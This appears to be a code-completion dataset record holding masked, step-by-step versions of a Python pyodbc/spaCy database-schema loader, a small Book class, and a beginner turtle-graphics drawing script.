self.columns = [column for entity in self.entities for column in\n entity.columns]\n\n def get_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.\n name.lower()))\n for column in entity.columns:\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n column.name.lower()))\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(\n synonym.synonym.lower()))\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n synonym.synonym.lower()))\n return matcher\n\n def get_custom_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + '_TABLE', nlp(entity.name.\n lower()))\n for column in entity.columns:\n matcher.add(column.name.upper() + '_COLUMN', nlp(column.\n name.lower()))\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + '_TABLE', nlp(synonym\n .synonym.lower()))\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + '_COLUMN', nlp(\n synonym.synonym.lower()))\n return matcher\n",
"step-4": "import pyodbc\nfrom configuration.config import Configuration\nfrom models.entities import Entities\nfrom models.columns import Columns\nfrom models.relationships import Relationship\nfrom models.synonyms import Synonyms\nfrom spacy.lemmatizer import Lemmatizer\nfrom spacy.lookups import Lookups\n\n\nclass DBModel(object):\n\n def __init__(self):\n self.entities = []\n self.columns = []\n self.relationships = []\n self.synonyms_col = []\n self.synonyms_tab = []\n self.entity_graph = []\n self.loaded_entities = []\n self.config = Configuration()\n self.conn = pyodbc.connect(self.config.get_sql_connection_string())\n lookups = Lookups()\n self.lemmatizer = Lemmatizer(lookups)\n self.load_db_model()\n\n def load_db_model(self):\n cursor = self.conn.cursor()\n cursor.execute(self.config.get_tables_sql_query())\n for row in cursor:\n self.entities.append(Entities(row.table_name, self.config.\n get_default_column(row.table_name)))\n cursor.execute(self.config.get_columns_sql_query())\n current_entity = None\n current_entity_name = ''\n for row in cursor:\n if current_entity_name != row.table_name:\n current_entity_name = row.table_name\n current_entity = next(en for en in self.entities if en.name ==\n current_entity_name)\n col_type = row.type_name\n if col_type == 'varchar' or col_type == 'nvarchar':\n col_type = 'string'\n current_entity.columns.append(Columns(row.column_name, col_type))\n current_entity = None\n current_entity_name = ''\n cursor.execute(self.config.get_FK_sql_query())\n for row in cursor:\n self.relationships.append(Relationship(row.parent_table, row.\n refrenced_table, row.parent_table_col, row.\n referenced_table_col))\n if len([en for en in self.entity_graph if en[0] == row.\n parent_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[\n 0] == row.parent_table)\n current_entity[1].append(row.refrenced_table)\n else:\n self.entity_graph.append((row.parent_table, [row.\n refrenced_table]))\n if len([en for en in self.entity_graph if en[0] == row.\n refrenced_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[\n 0] == row.refrenced_table)\n current_entity[1].append(row.parent_table)\n else:\n self.entity_graph.append((row.refrenced_table, [row.\n parent_table]))\n current_entity = None\n current_entity_name = ''\n cursor.execute(self.config.get_PK_sql_query())\n for row in cursor:\n if len([en for en in self.entity_graph if en[0] == row.table_name]\n ) == 1:\n current_entity = next(en for en in self.entities if en.name ==\n row.table_name)\n current_entity.primaryKey = row.primary_key\n for entity_to_load in self.config.get_entitites_to_load():\n entity_load_query = 'select distinct ' + entity_to_load['column'\n ] + ' from ' + entity_to_load['entity']\n cursor.execute(entity_load_query)\n entity_data = entity_to_load['entity'], []\n for row in cursor:\n entity_data[1].append(row[0])\n lemmas = self.lemmatizer(str(row[0]), u'NOUN')\n for lemma in lemmas:\n entity_data[1].append(str(lemma))\n self.loaded_entities.append(entity_data)\n for table_synonym in self.config.get_synonyms()['table']:\n orginal_val = table_synonym['original']\n synonyms_vals = table_synonym['synonyms']\n for synonyms_val in synonyms_vals:\n self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))\n for column_synonym in self.config.get_synonyms()['column']:\n orginal_val = column_synonym['original']\n synonyms_vals = column_synonym['synonyms']\n for synonyms_val in synonyms_vals:\n self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))\n self.columns = [column for entity in self.entities for column in\n entity.columns]\n\n def get_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.\n name.lower()))\n for column in entity.columns:\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n column.name.lower()))\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(\n synonym.synonym.lower()))\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n synonym.synonym.lower()))\n return matcher\n\n def get_custom_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + '_TABLE', nlp(entity.name.\n lower()))\n for column in entity.columns:\n matcher.add(column.name.upper() + '_COLUMN', nlp(column.\n name.lower()))\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + '_TABLE', nlp(synonym\n .synonym.lower()))\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + '_COLUMN', nlp(\n synonym.synonym.lower()))\n return matcher\n",
"step-5": "import pyodbc\n\nfrom configuration.config import Configuration\nfrom models.entities import Entities\nfrom models.columns import Columns\nfrom models.relationships import Relationship\nfrom models.synonyms import Synonyms\n\nfrom spacy.lemmatizer import Lemmatizer\nfrom spacy.lookups import Lookups\n\n\nclass DBModel(object):\n def __init__(self):\n self.entities = []\n self.columns = []\n self.relationships = []\n self.synonyms_col = []\n self.synonyms_tab = []\n self.entity_graph = []\n self.loaded_entities = []\n self.config = Configuration()\n self.conn = pyodbc.connect(self.config.get_sql_connection_string())\n lookups = Lookups()\n self.lemmatizer = Lemmatizer(lookups)\n self.load_db_model()\n\n def load_db_model(self):\n # loading the database from sql server\n cursor = self.conn.cursor()\n cursor.execute(self.config.get_tables_sql_query())\n for row in cursor:\n self.entities.append(Entities(row.table_name, self.config.get_default_column(row.table_name)))\n\n cursor.execute(self.config.get_columns_sql_query())\n current_entity = None\n current_entity_name = \"\"\n for row in cursor:\n if current_entity_name != row.table_name:\n current_entity_name = row.table_name\n current_entity = next(en for en in self.entities if en.name == current_entity_name)\n\n col_type = row.type_name\n if col_type == \"varchar\" or col_type == \"nvarchar\":\n col_type = \"string\"\n current_entity.columns.append(Columns(row.column_name, col_type))\n\n current_entity = None\n current_entity_name = \"\"\n cursor.execute(self.config.get_FK_sql_query())\n for row in cursor:\n self.relationships.append(Relationship(row.parent_table, row.refrenced_table, row.parent_table_col, row.referenced_table_col))\n if len([en for en in self.entity_graph if en[0] == row.parent_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[0] == row.parent_table)\n current_entity[1].append(row.refrenced_table)\n else:\n self.entity_graph.append((row.parent_table, [row.refrenced_table]))\n \n if len([en for en in self.entity_graph if en[0] == row.refrenced_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[0] == row.refrenced_table)\n current_entity[1].append(row.parent_table)\n else:\n self.entity_graph.append((row.refrenced_table, [row.parent_table]))\n\n current_entity = None\n current_entity_name = \"\"\n cursor.execute(self.config.get_PK_sql_query())\n for row in cursor:\n if len([en for en in self.entity_graph if en[0] == row.table_name]) == 1:\n current_entity = next(en for en in self.entities if en.name == row.table_name)\n current_entity.primaryKey = row.primary_key\n\n for entity_to_load in self.config.get_entitites_to_load():\n entity_load_query = \"select distinct \" + entity_to_load[\"column\"] + \" from \" + entity_to_load[\"entity\"]\n cursor.execute(entity_load_query)\n entity_data = (entity_to_load[\"entity\"], [])\n for row in cursor:\n entity_data[1].append(row[0])\n # add lemma strings\n lemmas = self.lemmatizer(str(row[0]), u'NOUN')\n for lemma in lemmas:\n entity_data[1].append(str(lemma))\n self.loaded_entities.append(entity_data)\n \n # load synonyms from declarative file\n # table sysnonyms\n for table_synonym in self.config.get_synonyms()[\"table\"]:\n orginal_val = table_synonym[\"original\"]\n synonyms_vals = table_synonym[\"synonyms\"]\n for synonyms_val in synonyms_vals:\n self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))\n\n # column sysnonyms\n for column_synonym in self.config.get_synonyms()[\"column\"]:\n orginal_val = column_synonym[\"original\"]\n synonyms_vals = column_synonym[\"synonyms\"]\n for synonyms_val in synonyms_vals:\n self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))\n\n\n # make a single array\n self.columns = [column for entity in self.entities for column in entity.columns]\n \n\n # might have to write a custom matcher TODO\n # build the matcher based upon the original value and domain synonyms defined\n def get_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + \"_TABLE\", None, nlp(entity.name.lower())) \n for column in entity.columns:\n matcher.add(column.name.upper() + \"_COLUMN\", None, nlp(column.name.lower()))\n\n # add table synonyms to matcher\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + \"_TABLE\", None, nlp(synonym.synonym.lower())) \n\n # add column synonyms to matcher\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + \"_COLUMN\", None, nlp(synonym.synonym.lower())) \n \n\n return matcher\n\n def get_custom_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + \"_TABLE\", nlp(entity.name.lower())) \n for column in entity.columns:\n matcher.add(column.name.upper() + \"_COLUMN\", nlp(column.name.lower()))\n\n # add table synonyms to matcher\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + \"_TABLE\", nlp(synonym.synonym.lower())) \n\n # add column synonyms to matcher\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + \"_COLUMN\", nlp(synonym.synonym.lower())) \n \n\n return matcher\n",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Book:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Book:
<|reserved_special_token_0|>
def __init__(self, title, authors, pub_year):
self.title = title
self.authors = authors
self.pub_year = pub_year
<|reserved_special_token_1|>
class Book:
"""Class that defines book model."""
def __init__(self, title, authors, pub_year):
self.title = title
self.authors = authors
self.pub_year = pub_year
|
flexible
|
{
"blob_id": "14345a8c4e20d84dfc87476d890f59530a8f4d96",
"index": 7237,
"step-1": "<mask token>\n",
"step-2": "class Book:\n <mask token>\n <mask token>\n",
"step-3": "class Book:\n <mask token>\n\n def __init__(self, title, authors, pub_year):\n self.title = title\n self.authors = authors\n self.pub_year = pub_year\n",
"step-4": "class Book:\n \"\"\"Class that defines book model.\"\"\"\n\n def __init__(self, title, authors, pub_year):\n self.title = title\n self.authors = authors\n self.pub_year = pub_year\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def square():
forward(100)
right(90)
forward(100)
right(90)
forward(100)
right(90)
forward(100)
mainloop()
def pentagon():
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
mainloop()
<|reserved_special_token_0|>
def octagon():
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
mainloop()
<|reserved_special_token_0|>
def house():
rectangle(200, 450, True, 'Red')
<|reserved_special_token_0|>
def sun():
circlep(3, True, 'yellow', 'yellow')
def sidewalk():
fillcolor('grey')
begin_fill()
left(20)
forward(400)
left(75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
<|reserved_special_token_0|>
def craystar():
color('red', 'yellow')
begin_fill()
for i in range(36):
forward(200)
left(170)
end_fill()
def craytriangle():
color('black', 'blue')
begin_fill()
i = 60
while i > 0:
forward(i)
right(120)
i -= 5
end_fill()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def square():
forward(100)
right(90)
forward(100)
right(90)
forward(100)
right(90)
forward(100)
mainloop()
def pentagon():
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
mainloop()
<|reserved_special_token_0|>
def octagon():
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
mainloop()
def star():
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
mainloop()
<|reserved_special_token_0|>
def house():
rectangle(200, 450, True, 'Red')
<|reserved_special_token_0|>
def sun():
circlep(3, True, 'yellow', 'yellow')
def sidewalk():
fillcolor('grey')
begin_fill()
left(20)
forward(400)
left(75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
<|reserved_special_token_0|>
def craystar():
color('red', 'yellow')
begin_fill()
for i in range(36):
forward(200)
left(170)
end_fill()
def craytriangle():
color('black', 'blue')
begin_fill()
i = 60
while i > 0:
forward(i)
right(120)
i -= 5
end_fill()
def craysquare():
color('green', 'Blue')
begin_fill()
for i in range(12):
for i in range(4):
forward(60)
right(90)
for i in range(12):
forward(random.randint(1, 60))
right(90)
end_fill()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def square():
forward(100)
right(90)
forward(100)
right(90)
forward(100)
right(90)
forward(100)
mainloop()
def pentagon():
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
mainloop()
<|reserved_special_token_0|>
def octagon():
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
mainloop()
def star():
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
mainloop()
def circle():
for i in range(370):
forward(2)
right(1)
mainloop()
<|reserved_special_token_0|>
def house():
rectangle(200, 450, True, 'Red')
def roof():
fillcolor('brown')
begin_fill()
forward(293.717)
right(80)
forward(293.717)
right(140)
forward(450)
end_fill()
<|reserved_special_token_0|>
def sun():
circlep(3, True, 'yellow', 'yellow')
def sidewalk():
fillcolor('grey')
begin_fill()
left(20)
forward(400)
left(75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
<|reserved_special_token_0|>
def craystar():
color('red', 'yellow')
begin_fill()
for i in range(36):
forward(200)
left(170)
end_fill()
def craytriangle():
color('black', 'blue')
begin_fill()
i = 60
while i > 0:
forward(i)
right(120)
i -= 5
end_fill()
def craysquare():
color('green', 'Blue')
begin_fill()
for i in range(12):
for i in range(4):
forward(60)
right(90)
for i in range(12):
forward(random.randint(1, 60))
right(90)
end_fill()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def eTriangle():
forward(100)
right(120)
forward(100)
right(120)
forward(100)
right(120)
mainloop()
def square():
forward(100)
right(90)
forward(100)
right(90)
forward(100)
right(90)
forward(100)
mainloop()
def pentagon():
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
mainloop()
<|reserved_special_token_0|>
def octagon():
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
mainloop()
def star():
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
mainloop()
def circle():
for i in range(370):
forward(2)
right(1)
mainloop()
<|reserved_special_token_0|>
def door():
rectangle(50, 100, True, 'Brown')
penup()
right(90)
forward(50)
right(90)
forward(50)
right(90)
forward(10)
circle(0.1, True, 'Black')
<|reserved_special_token_0|>
def house():
rectangle(200, 450, True, 'Red')
def roof():
fillcolor('brown')
begin_fill()
forward(293.717)
right(80)
forward(293.717)
right(140)
forward(450)
end_fill()
<|reserved_special_token_0|>
def sun():
circlep(3, True, 'yellow', 'yellow')
def sidewalk():
fillcolor('grey')
begin_fill()
left(20)
forward(400)
left(75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
<|reserved_special_token_0|>
def craystar():
color('red', 'yellow')
begin_fill()
for i in range(36):
forward(200)
left(170)
end_fill()
def craytriangle():
color('black', 'blue')
begin_fill()
i = 60
while i > 0:
forward(i)
right(120)
i -= 5
end_fill()
def craysquare():
color('green', 'Blue')
begin_fill()
for i in range(12):
for i in range(4):
forward(60)
right(90)
for i in range(12):
forward(random.randint(1, 60))
right(90)
end_fill()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from turtle import *
from shapes import *
#1-
#1.triangle
def eTriangle():
forward(100)
right(120)
forward(100)
right(120)
forward(100)
right(120)
mainloop()
#2.square
def square():
forward(100)
right(90)
forward(100)
right(90)
forward(100)
right(90)
forward(100)
mainloop()
#3.pentagon
def pentagon():
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
right(72)
forward(100)
mainloop()
#4.hexagon
def hexagon():
forward(100)
right(60)
forward(100)
right(60)
forward(100)
right(60)
forward(100)
right(60)
forward(100)
right(60)
forward(100)
mainloop()
#5.octagon
def octagon():
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
right(45)
forward(100)
mainloop()
#6.star
def star():
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
right(144)
forward(100)
mainloop()
#7.circle
def circle():
for i in range(370):
forward(2)
right(1)
mainloop()
#2-
from shapes import *
eTriangle()
square()
pentagon()
hexagon()
octagon()
star()
circle()
mainloop()
#3-
bgcolor("MidnightBlue")
starp(20, True, "yellow", "MidnightBlue")
right (20)
forward(100)
starp(20, True, "yellow", "MidnightBlue")
right (30)
forward(150)
starp(20, True, "yellow", "MidnightBlue")
right (40)
forward(200)
starp(20, True, "yellow", "MidnightBlue")
right (50)
forward(250)
starp(20, True, "yellow", "MidnightBlue")
right (60)
forward(300)
starp(20, True, "yellow", "MidnightBlue")
forward(100)
starp(20, True, "yellow", "MidnightBlue")
forward(100)
starp(20, True, "yellow", "MidnightBlue")
left (90)
forward(300)
starp(20, True, "yellow", "MidnightBlue")
right (50)
forward (300)
starp(20, True, "yellow", "MidnightBlue")
right(50)
forward(300)
starp(20, True, "yellow", "MidnightBlue")
right (50)
forward (275)
circlep(3, True, "SlateGrey", "MidnightBlue")
right(60)
forward(20)
mainloop()
#4-
bgcolor("skyblue")
right(90)
penup()
forward(100)
right(90)
forward(200)
fillcolor("Green")
begin_fill()
forward (300)
left(90)
forward (300)
left(90)
forward(1250)
left(90)
forward(300)
left(90)
forward(1000)
end_fill()
right (90)
pendown()
rectangle(200, 450, True, "Red")
left(180)
forward(200)
left(90)
penup()
forward(100)
right(90)
pendown
rectangle(50, 100, True, "Brown")
penup()
right(90)
forward(50)
right(90)
forward(50)
right (90)
forward(10)
circle(.1, True, "Black")
penup()
forward(40)
left(90)
forward(50)
pendown()
fillcolor("grey")
begin_fill()
left (20)
forward(400)
left (75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
right(5)
penup()
forward(200)
right(90)
forward(200)
right(90)
left(40)
pendown()
fillcolor("brown")
begin_fill()
forward(293.717)
right(80)
forward(293.717)
right(140)
forward(450)
end_fill()
penup()
left(90)
forward(75)
left(90)
forward(75)
pendown()
square(50, True, "blue", "Black")
right(90)
square(25, False, "blue", "black")
right(90)
forward(50)
right(90)
forward(25)
square(25, False, "blue", "black")
penup()
left(90)
forward(25)
right(90)
forward(200)
pendown()
square(50, True, "blue", "Black")
right(90)
square(25, False, "blue", "black")
right(90)
forward(50)
right(90)
forward(25)
square(25, False, "blue", "black")
penup()
left(90)
forward(250)
left (90)
forward(400)
circlep(3, True, "yellow", "yellow")
mainloop()
#5-
def door():
rectangle(50, 100, True, "Brown")
penup()
right(90)
forward(50)
right(90)
forward(50)
right (90)
forward(10)
circle(.1, True, "Black")
def grass():
fillcolor("Green")
begin_fill()
forward (300)
left(90)
forward (300)
left(90)
forward(1250)
left(90)
forward(300)
left(90)
forward(1000)
end_fill()
def house():
rectangle(200, 450, True, "Red")
def roof():
fillcolor("brown")
begin_fill()
forward(293.717)
right(80)
forward(293.717)
right(140)
forward(450)
end_fill()
def window():
square(50, True, "blue", "Black")
right(90)
square(25, False, "blue", "black")
right(90)
forward(50)
right(90)
forward(25)
square(25, False, "blue", "black")
def sun():
circlep(3, True, "yellow", "yellow")
def sidewalk():
fillcolor("grey")
begin_fill()
left (20)
forward(400)
left (75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
bgcolor("skyblue")
right(90)
penup()
forward(100)
right(90)
forward(200)
grass()
right (90)
pendown()
house()
left(180)
forward(200)
left(90)
penup()
forward(100)
right(90)
pendown
door()
penup()
forward(40)
left(90)
forward(50)
pendown()
sidewalk()
right(5)
penup()
forward(200)
right(90)
forward(200)
right(90)
left(40)
pendown()
roof()
penup()
left(90)
forward(75)
left(90)
forward(75)
pendown()
window()
penup()
left(90)
forward(25)
right(90)
forward(200)
pendown()
window()
penup()
left(90)
forward(250)
left (90)
forward(400)
sun()
mainloop()
#6-
import random
def craystar():
color('red', 'yellow')
begin_fill()
for i in range(36):
forward(200)
left(170)
end_fill()
def craytriangle():
color('black', 'blue')
begin_fill()
i = 60
while i > 0:
forward(i)
right(120)
i -= 5
end_fill()
def craysquare():
color("green", "Blue")
begin_fill()
for i in range(12):
for i in range(4):
forward(60)
right(90)
for i in range(12):
forward (random.randint(1,60))
right(90)
end_fill()
craysquare()
forward (50)
craysquare()
forward (50)
craysquare()
forward (50)
craystar()
forward(random.randint(1,100))
right(random.randint(1, 90))
craytriangle()
forward(random.randint(1,100))
right(random.randint(1, 90))
craystar()
forward(random.randint(1,100))
right(random.randint(1, 90))
craytriangle()
forward(random.randint(1,100))
right(random.randint(1, 90))
craystar()
forward(random.randint(1,100))
right(random.randint(1, 90))
craytriangle()
mainloop()
|
flexible
|
{
"blob_id": "92d689e5caa2d8c65f86af0f8b49b009d162a783",
"index": 7379,
"step-1": "<mask token>\n\n\ndef square():\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n mainloop()\n\n\ndef pentagon():\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n mainloop()\n\n\n<mask token>\n\n\ndef octagon():\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n mainloop()\n\n\n<mask token>\n\n\ndef house():\n rectangle(200, 450, True, 'Red')\n\n\n<mask token>\n\n\ndef sun():\n circlep(3, True, 'yellow', 'yellow')\n\n\ndef sidewalk():\n fillcolor('grey')\n begin_fill()\n left(20)\n forward(400)\n left(75)\n forward(50)\n left(105)\n forward(400)\n left(75)\n forward(50)\n end_fill()\n\n\n<mask token>\n\n\ndef craystar():\n color('red', 'yellow')\n begin_fill()\n for i in range(36):\n forward(200)\n left(170)\n end_fill()\n\n\ndef craytriangle():\n color('black', 'blue')\n begin_fill()\n i = 60\n while i > 0:\n forward(i)\n right(120)\n i -= 5\n end_fill()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef square():\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n mainloop()\n\n\ndef pentagon():\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n mainloop()\n\n\n<mask token>\n\n\ndef octagon():\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n mainloop()\n\n\ndef star():\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n mainloop()\n\n\n<mask token>\n\n\ndef house():\n rectangle(200, 450, True, 'Red')\n\n\n<mask token>\n\n\ndef sun():\n circlep(3, True, 'yellow', 'yellow')\n\n\ndef sidewalk():\n fillcolor('grey')\n begin_fill()\n left(20)\n forward(400)\n left(75)\n forward(50)\n left(105)\n forward(400)\n left(75)\n forward(50)\n end_fill()\n\n\n<mask token>\n\n\ndef craystar():\n color('red', 'yellow')\n begin_fill()\n for i in range(36):\n forward(200)\n left(170)\n end_fill()\n\n\ndef craytriangle():\n color('black', 'blue')\n begin_fill()\n i = 60\n while i > 0:\n forward(i)\n right(120)\n i -= 5\n end_fill()\n\n\ndef craysquare():\n color('green', 'Blue')\n begin_fill()\n for i in range(12):\n for i in range(4):\n forward(60)\n right(90)\n for i in range(12):\n forward(random.randint(1, 60))\n right(90)\n end_fill()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef square():\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n mainloop()\n\n\ndef pentagon():\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n mainloop()\n\n\n<mask token>\n\n\ndef octagon():\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n mainloop()\n\n\ndef star():\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n mainloop()\n\n\ndef circle():\n for i in range(370):\n forward(2)\n right(1)\n mainloop()\n\n\n<mask token>\n\n\ndef house():\n rectangle(200, 450, True, 'Red')\n\n\ndef roof():\n fillcolor('brown')\n begin_fill()\n forward(293.717)\n right(80)\n forward(293.717)\n right(140)\n forward(450)\n end_fill()\n\n\n<mask token>\n\n\ndef sun():\n circlep(3, True, 'yellow', 'yellow')\n\n\ndef sidewalk():\n fillcolor('grey')\n begin_fill()\n left(20)\n forward(400)\n left(75)\n forward(50)\n left(105)\n forward(400)\n left(75)\n forward(50)\n end_fill()\n\n\n<mask token>\n\n\ndef craystar():\n color('red', 'yellow')\n begin_fill()\n for i in range(36):\n forward(200)\n left(170)\n end_fill()\n\n\ndef craytriangle():\n color('black', 'blue')\n begin_fill()\n i = 60\n while i > 0:\n forward(i)\n right(120)\n i -= 5\n end_fill()\n\n\ndef craysquare():\n color('green', 'Blue')\n begin_fill()\n for i in range(12):\n for i in range(4):\n forward(60)\n right(90)\n for i in range(12):\n forward(random.randint(1, 60))\n right(90)\n end_fill()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef eTriangle():\n forward(100)\n right(120)\n forward(100)\n right(120)\n forward(100)\n right(120)\n mainloop()\n\n\ndef square():\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n right(90)\n forward(100)\n mainloop()\n\n\ndef pentagon():\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n right(72)\n forward(100)\n mainloop()\n\n\n<mask token>\n\n\ndef octagon():\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n right(45)\n forward(100)\n mainloop()\n\n\ndef star():\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n right(144)\n forward(100)\n mainloop()\n\n\ndef circle():\n for i in range(370):\n forward(2)\n right(1)\n mainloop()\n\n\n<mask token>\n\n\ndef door():\n rectangle(50, 100, True, 'Brown')\n penup()\n right(90)\n forward(50)\n right(90)\n forward(50)\n right(90)\n forward(10)\n circle(0.1, True, 'Black')\n\n\n<mask token>\n\n\ndef house():\n rectangle(200, 450, True, 'Red')\n\n\ndef roof():\n fillcolor('brown')\n begin_fill()\n forward(293.717)\n right(80)\n forward(293.717)\n right(140)\n forward(450)\n end_fill()\n\n\n<mask token>\n\n\ndef sun():\n circlep(3, True, 'yellow', 'yellow')\n\n\ndef sidewalk():\n fillcolor('grey')\n begin_fill()\n left(20)\n forward(400)\n left(75)\n forward(50)\n left(105)\n forward(400)\n left(75)\n forward(50)\n end_fill()\n\n\n<mask token>\n\n\ndef craystar():\n color('red', 'yellow')\n begin_fill()\n for i in range(36):\n forward(200)\n left(170)\n end_fill()\n\n\ndef craytriangle():\n color('black', 'blue')\n begin_fill()\n i = 60\n while i > 0:\n forward(i)\n right(120)\n i -= 5\n end_fill()\n\n\ndef craysquare():\n color('green', 'Blue')\n begin_fill()\n for i in range(12):\n for i in range(4):\n forward(60)\n right(90)\n for i in range(12):\n forward(random.randint(1, 60))\n right(90)\n end_fill()\n\n\n<mask token>\n",
